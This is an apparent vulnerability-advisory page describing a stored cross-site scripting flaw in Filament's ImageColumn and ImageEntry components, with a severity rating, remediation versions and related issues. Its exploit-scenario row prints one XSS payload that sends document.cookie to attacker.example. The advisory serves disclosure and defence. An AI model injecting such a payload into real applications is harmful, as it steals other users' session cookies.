Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
PR:L reflects required write access to the affected column; S:C captures cross-user browser execution; UI:N applies because stored payload fires automatically on page load.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Filament is a collection of full-stack components for accelerated Laravel development. From 4.0.0 until 4.11.5 and 5.6.5, the ImageColumn and ImageEntry components render raw database values without escaping HTML. Where the data passed to these components isn't validated, an attacker could plant malicious HTML or JavaScript and achieve stored XSS that executes for users who view the table or schema. This vulnerability is fixed in 4.11.5 and 5.6.5.
AnalysisAI
Stored cross-site scripting in Filament's ImageColumn and ImageEntry components allows low-privileged authenticated attackers to plant malicious HTML or JavaScript into database-backed image fields, which then executes in the browsers of any user who views the affected table or schema. Affected versions span 4.0.0 through the pre-fix releases across both the v4 and v5 branches of this widely-used Laravel admin panel framework. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to have write access to a database column that is rendered by an ImageColumn or ImageEntry component in a Filament table or infolist - this is the CVSS PR:L constraint. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) reflects a realistic stored XSS profile: network-accessible, low complexity, requiring only low-privilege access to plant the payload, with scope change because execution occurs in other users' browsers. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with low-privileged authenticated access to a Filament-backed application - such as a user who can submit a profile image URL or any form field that writes to a column rendered by ImageColumn - submits a value such as `"><img src=x onerror=fetch('https://attacker.example/steal?c='+document.cookie)>` instead of a valid image URL. The malicious string is stored in the database without sanitization. … |
| Remediation | Upgrade to Filament 4.11.5 (for v4 branch users) or 5.6.5 (for v5 branch users) - these are the vendor-confirmed fixed releases per the GitHub Security Advisory GHSA-3fc8-8hp6-6jr4 at https://github.com/filamentphp/filament/security/advisories/GHSA-3fc8-8hp6-6jr4. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Recovery code reuse in Filament (Laravel admin panel framework) versions 4.0.0 through 4.11.4 and 5.0.0 through 5.6.4 al
Unauthenticated arbitrary file upload in Filament (Laravel component framework) versions 3.0.0 through 3.3.51, 4.x throu
Filament is a collection of full-stack components for Laravel development. Rated medium severity (CVSS 6.1), this vulner
Filament's login page leaks account existence through a measurable timing side-channel, allowing unauthenticated remote
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38395
GHSA-3fc8-8hp6-6jr4